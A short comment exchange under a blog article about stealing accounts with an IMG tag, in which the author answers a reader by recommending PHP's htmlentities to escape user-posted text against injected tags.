re: Stealing Accounts with an IMG Tag VIEW POST


I read all of this and anticipated the part where you tell me how to avoid it and instead only got "go investigate htmlentities" :/


Thanks for checking the article out! I've updated the article to be more detailed in this area, but I'll include that in this reply as well. When you allow a user to post text to your site, you take the text they posted on the backend and escape it with the htmlentities function if you're using PHP.

$postedText = htmlentities($postedText);

It's just that simple. This will get rid of any img tags that users try to inject.

Code of Conduct Report abuse